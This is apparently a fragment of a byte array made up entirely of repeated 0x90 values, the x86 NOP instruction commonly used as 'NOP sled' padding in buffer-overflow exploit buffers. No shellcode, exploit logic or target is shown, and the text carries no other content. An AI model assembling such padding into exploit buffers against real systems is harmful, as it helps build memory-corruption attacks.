0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, - 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 